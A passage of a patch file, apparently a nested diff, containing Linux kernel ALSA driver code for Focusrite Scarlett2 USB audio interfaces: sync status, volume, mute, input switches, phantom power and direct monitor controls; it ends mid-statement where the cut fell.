+-/* Update sync control after receiving notification that the status
+- * has changed
+- */
+-static int scarlett2_update_sync(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	private->sync_updated = 0;
+-	return scarlett2_usb_get_sync_status(mixer, &private->sync);
+-}
+-
+-static int scarlett2_sync_ctl_info(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *texts[2] = {
+-		"Unlocked", "Locked"
+-	};
+-	return snd_ctl_enum_info(uinfo, 1, 2, texts);
+-}
+-
+-static int scarlett2_sync_ctl_get(struct snd_kcontrol *kctl,
+-				  struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->sync_updated) {
+-		err = scarlett2_update_sync(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->sync;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_sync_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READ,
+-	.name = "",
+-	.info = scarlett2_sync_ctl_info,
+-	.get  = scarlett2_sync_ctl_get
+-};
+-
+-static int scarlett2_add_sync_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	/* devices without a mixer also don't support reporting sync status */
+-	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_sync_ctl,
+-				     0, 1, "Sync Status", &private->sync_ctl);
+-}
+-
+-/*** Analogue Line Out Volume Controls ***/
+-
+-/* Update hardware volume controls after receiving notification that
+- * they have changed
+- */
+-static int scarlett2_update_volumes(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	struct scarlett2_usb_volume_status volume_status;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int err, i;
+-	int mute;
+-
+-	private->vol_updated = 0;
+-
+-	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
+-	if (err < 0)
+-		return err;
+-
+-	private->master_vol = clamp(
+-		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
+-		0, SCARLETT2_VOLUME_BIAS);
+-
+-	if (info->line_out_hw_vol)
+-		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
+-			private->dim_mute[i] = !!volume_status.dim_mute[i];
+-
+-	mute = private->dim_mute[SCARLETT2_BUTTON_MUTE];
+-
+-	for (i = 0; i < num_line_out; i++)
+-		if (private->vol_sw_hw_switch[i]) {
+-			private->vol[i] = private->master_vol;
+-			private->mute_switch[i] = mute;
+-		}
+-
+-	return 0;
+-}
+-
+-static int scarlett2_volume_ctl_info(struct snd_kcontrol *kctl,
+-				     struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = elem->channels;
+-	uinfo->value.integer.min = 0;
+-	uinfo->value.integer.max = SCARLETT2_VOLUME_BIAS;
+-	uinfo->value.integer.step = 1;
+-	return 0;
+-}
+-
+-static int scarlett2_master_volume_ctl_get(struct snd_kcontrol *kctl,
+-					   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->master_vol;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int line_out_remap(struct scarlett2_data *private, int index)
+-{
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int line_out_count =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-
+-	if (!info->line_out_remap_enable)
+-		return index;
+-
+-	if (index >= line_out_count)
+-		return index;
+-
+-	return info->line_out_remap[index];
+-}
+-
+-static int scarlett2_volume_ctl_get(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->vol[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_volume_ctl_put(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->vol[index];
+-	val = ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->vol[index] = val;
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
+-				       index, val - SCARLETT2_VOLUME_BIAS);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const DECLARE_TLV_DB_MINMAX(
+-	db_scale_scarlett2_gain, -SCARLETT2_VOLUME_BIAS * 100, 0
+-);
+-
+-static const struct snd_kcontrol_new scarlett2_master_volume_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READ |
+-		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
+-	.name = "",
+-	.info = scarlett2_volume_ctl_info,
+-	.get  = scarlett2_master_volume_ctl_get,
+-	.private_value = 0, /* max value */
+-	.tlv = { .p = db_scale_scarlett2_gain }
+-};
+-
+-static const struct snd_kcontrol_new scarlett2_line_out_volume_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
+-		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
+-	.name = "",
+-	.info = scarlett2_volume_ctl_info,
+-	.get  = scarlett2_volume_ctl_get,
+-	.put  = scarlett2_volume_ctl_put,
+-	.private_value = 0, /* max value */
+-	.tlv = { .p = db_scale_scarlett2_gain }
+-};
+-
+-/*** Mute Switch Controls ***/
+-
+-static int scarlett2_mute_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->mute_switch[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_mute_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->mute_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->mute_switch[index] = val;
+-
+-	/* Send mute change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_mute_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_mute_ctl_get,
+-	.put  = scarlett2_mute_ctl_put,
+-};
+-
+-/*** HW/SW Volume Switch Controls ***/
+-
+-static void scarlett2_sw_hw_ctl_ro(struct scarlett2_data *private, int index)
+-{
+-	private->sw_hw_ctls[index]->vd[0].access &=
+-		~SNDRV_CTL_ELEM_ACCESS_WRITE;
+-}
+-
+-static void scarlett2_sw_hw_ctl_rw(struct scarlett2_data *private, int index)
+-{
+-	private->sw_hw_ctls[index]->vd[0].access |=
+-		SNDRV_CTL_ELEM_ACCESS_WRITE;
+-}
+-
+-static int scarlett2_sw_hw_enum_ctl_info(struct snd_kcontrol *kctl,
+-					 struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[2] = {
+-		"SW", "HW"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 2, values);
+-}
+-
+-static int scarlett2_sw_hw_enum_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-
+-	ucontrol->value.enumerated.item[0] = private->vol_sw_hw_switch[index];
+-	return 0;
+-}
+-
+-static void scarlett2_vol_ctl_set_writable(struct usb_mixer_interface *mixer,
+-					   int index, int value)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	struct snd_card *card = mixer->chip->card;
+-
+-	/* Set/Clear write bits */
+-	if (value) {
+-		private->vol_ctls[index]->vd[0].access |=
+-			SNDRV_CTL_ELEM_ACCESS_WRITE;
+-		private->mute_ctls[index]->vd[0].access |=
+-			SNDRV_CTL_ELEM_ACCESS_WRITE;
+-	} else {
+-		private->vol_ctls[index]->vd[0].access &=
+-			~SNDRV_CTL_ELEM_ACCESS_WRITE;
+-		private->mute_ctls[index]->vd[0].access &=
+-			~SNDRV_CTL_ELEM_ACCESS_WRITE;
+-	}
+-
+-	/* Notify of write bit and possible value change */
+-	snd_ctl_notify(card,
+-		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+-		       &private->vol_ctls[index]->id);
+-	snd_ctl_notify(card,
+-		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+-		       &private->mute_ctls[index]->id);
+-}
+-
+-static int scarlett2_sw_hw_change(struct usb_mixer_interface *mixer,
+-				  int ctl_index, int val)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, ctl_index);
+-	int err;
+-
+-	private->vol_sw_hw_switch[index] = val;
+-
+-	/* Change access mode to RO (hardware controlled volume)
+-	 * or RW (software controlled volume)
+-	 */
+-	scarlett2_vol_ctl_set_writable(mixer, ctl_index, !val);
+-
+-	/* Reset volume/mute to master volume/mute */
+-	private->vol[index] = private->master_vol;
+-	private->mute_switch[index] = private->dim_mute[SCARLETT2_BUTTON_MUTE];
+-
+-	/* Set SW volume to current HW volume */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
+-		index, private->master_vol - SCARLETT2_VOLUME_BIAS);
+-	if (err < 0)
+-		return err;
+-
+-	/* Set SW mute to current HW mute */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
+-		index, private->dim_mute[SCARLETT2_BUTTON_MUTE]);
+-	if (err < 0)
+-		return err;
+-
+-	/* Send SW/HW switch change to the device */
+-	return scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_SW_HW_SWITCH,
+-					index, val);
+-}
+-
+-static int scarlett2_sw_hw_enum_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int ctl_index = elem->control;
+-	int index = line_out_remap(private, ctl_index);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->vol_sw_hw_switch[index];
+-	val = !!ucontrol->value.enumerated.item[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	err = scarlett2_sw_hw_change(mixer, ctl_index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_sw_hw_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_sw_hw_enum_ctl_info,
+-	.get  = scarlett2_sw_hw_enum_ctl_get,
+-	.put  = scarlett2_sw_hw_enum_ctl_put,
+-};
+-
+-/*** Line Level/Instrument Level Switch Controls ***/
+-
+-static int scarlett2_update_input_other(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	private->input_other_updated = 0;
+-
+-	if (info->level_input_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
+-			info->level_input_count + info->level_input_first,
+-			private->level_switch);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	if (info->pad_input_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_PAD_SWITCH,
+-			info->pad_input_count, private->pad_switch);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	if (info->air_input_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_AIR_SWITCH,
+-			info->air_input_count, private->air_switch);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	if (info->phantom_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
+-			info->phantom_count, private->phantom_switch);
+-		if (err < 0)
+-			return err;
+-
+-		err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE,
+-			1, &private->phantom_persistence);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static int scarlett2_level_enum_ctl_info(struct snd_kcontrol *kctl,
+-					 struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[2] = {
+-		"Line", "Inst"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 2, values);
+-}
+-
+-static int scarlett2_level_enum_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	int index = elem->control + info->level_input_first;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->level_switch[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_level_enum_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	int index = elem->control + info->level_input_first;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->level_switch[index];
+-	val = !!ucontrol->value.enumerated.item[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->level_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_level_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_level_enum_ctl_info,
+-	.get  = scarlett2_level_enum_ctl_get,
+-	.put  = scarlett2_level_enum_ctl_put,
+-};
+-
+-/*** Pad Switch Controls ***/
+-
+-static int scarlett2_pad_ctl_get(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] =
+-		private->pad_switch[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_pad_ctl_put(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->pad_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->pad_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PAD_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_pad_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_pad_ctl_get,
+-	.put  = scarlett2_pad_ctl_put,
+-};
+-
+-/*** Air Switch Controls ***/
+-
+-static int scarlett2_air_ctl_get(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->air_switch[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_air_ctl_put(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->air_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->air_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_AIR_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_air_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_air_ctl_get,
+-	.put  = scarlett2_air_ctl_put,
+-};
+-
+-/*** Phantom Switch Controls ***/
+-
+-static int scarlett2_phantom_ctl_get(struct snd_kcontrol *kctl,
+-				     struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] =
+-		private->phantom_switch[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_phantom_ctl_put(struct snd_kcontrol *kctl,
+-				     struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->phantom_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->phantom_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_phantom_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_phantom_ctl_get,
+-	.put  = scarlett2_phantom_ctl_put,
+-};
+-
+-/*** Phantom Persistence Control ***/
+-
+-static int scarlett2_phantom_persistence_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->phantom_persistence;
+-	return 0;
+-}
+-
+-static int scarlett2_phantom_persistence_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->phantom_persistence;
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->phantom_persistence = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE, index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_phantom_persistence_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_phantom_persistence_ctl_get,
+-	.put  = scarlett2_phantom_persistence_ctl_put,
+-};
+-
+-/*** Direct Monitor Control ***/
+-
+-static int scarlett2_update_monitor_other(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	int err;
+-
+-	/* monitor_other_enable[0] enables speaker switching
+-	 * monitor_other_enable[1] enables talkback
+-	 */
+-	u8 monitor_other_enable[2];
+-
+-	/* monitor_other_switch[0] activates the alternate speakers
+-	 * monitor_other_switch[1] activates talkback
+-	 */
+-	u8 monitor_other_switch[2];
+-
+-	private->monitor_other_updated = 0;
+-
+-	if (info->direct_monitor)
+-		return scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_DIRECT_MONITOR,
+-			1, &private->direct_monitor_switch);
+-
+-	/* if it doesn't do speaker switching then it also doesn't do
+-	 * talkback
+-	 */
+-	if (!info->has_speaker_switching)
+-		return 0;
+-
+-	err = scarlett2_usb_get_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
+-		2, monitor_other_enable);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_usb_get_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
+-		2, monitor_other_switch);
+-	if (err < 0)
+-		return err;
+-
+-	if (!monitor_other_enable[0])
+-		private->speaker_switching_switch = 0;
+-	else
+-		private->speaker_switching_switch = monitor_other_switch[0] + 1;
+-
+-	if (info->has_talkback) {
+-		const int (*port_count)[SCARLETT2_PORT_DIRNS] =
+-			info->port_count;
+-		int num_mixes =
+-			port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-		u16 bitmap;
+-		int i;
+-
+-		if (!monitor_other_enable[1])
+-			private->talkback_switch = 0;
+-		else
+-			private->talkback_switch = monitor_other_switch[1] + 1;
+-
+-		err = scarlett2_usb_get_config(mixer,
+-					       SCARLETT2_CONFIG_TALKBACK_MAP,
+-					       1, &bitmap);
+-		if (err < 0)
+-			return err;
+-		for (i = 0; i < num_mixes; i++, bitmap >>= 1)
+-			private->talkback_map[i] = bitmap & 1;
+-	}
+-
+-	return 0;
+-}
+-
+-static int scarlett2_direct_monitor_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->monitor_other_updated) {
+-		err = scarlett2_update_monitor_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->direct_monitor_switch;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_direct_monitor_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->direct_monitor_switch;
+-	val = min(ucontrol->value.enumerated.item[0], 2U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->direct_monitor_switch = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_DIRECT_MONITOR, index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_direct_monitor_stereo_enum_ctl_info(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[3] = {
+-		"Off", "Mono", "Stereo"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 3, values);
+-}
+-
+-/* Direct Monitor for Solo is mono-only and only needs a boolean control
+- * Direct Monitor for 2i2 is selectable between Off/Mono/Stereo
+- */
+-static const struct snd_kcontrol_new scarlett2_direct_monitor_ctl[2] = {
+-	{
+-		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-		.name = "",
+-		.info = snd_ctl_boolean_mono_info,
+-		.get  = scarlett2_direct_monitor_ctl_get,
+-		.put  = scarlett2_direct_monitor_ctl_put,
+-	},
+-	{
+-		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-		.name = "",
+-		.info = scarlett2_direct_monitor_stereo_enum_ctl_info,
+-		.get  = scarlett2_direct_monitor_ctl_get,
+-		.put  = scarlett2_direct_monitor_ctl_put,
+-	}
+-};
+-
+-static int scarlett2_add_direct_monitor_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const char *s;
+-
+-	if (!info->direct_monitor)
+-		return 0;
+-
+-	s = info->direct_monitor == 1
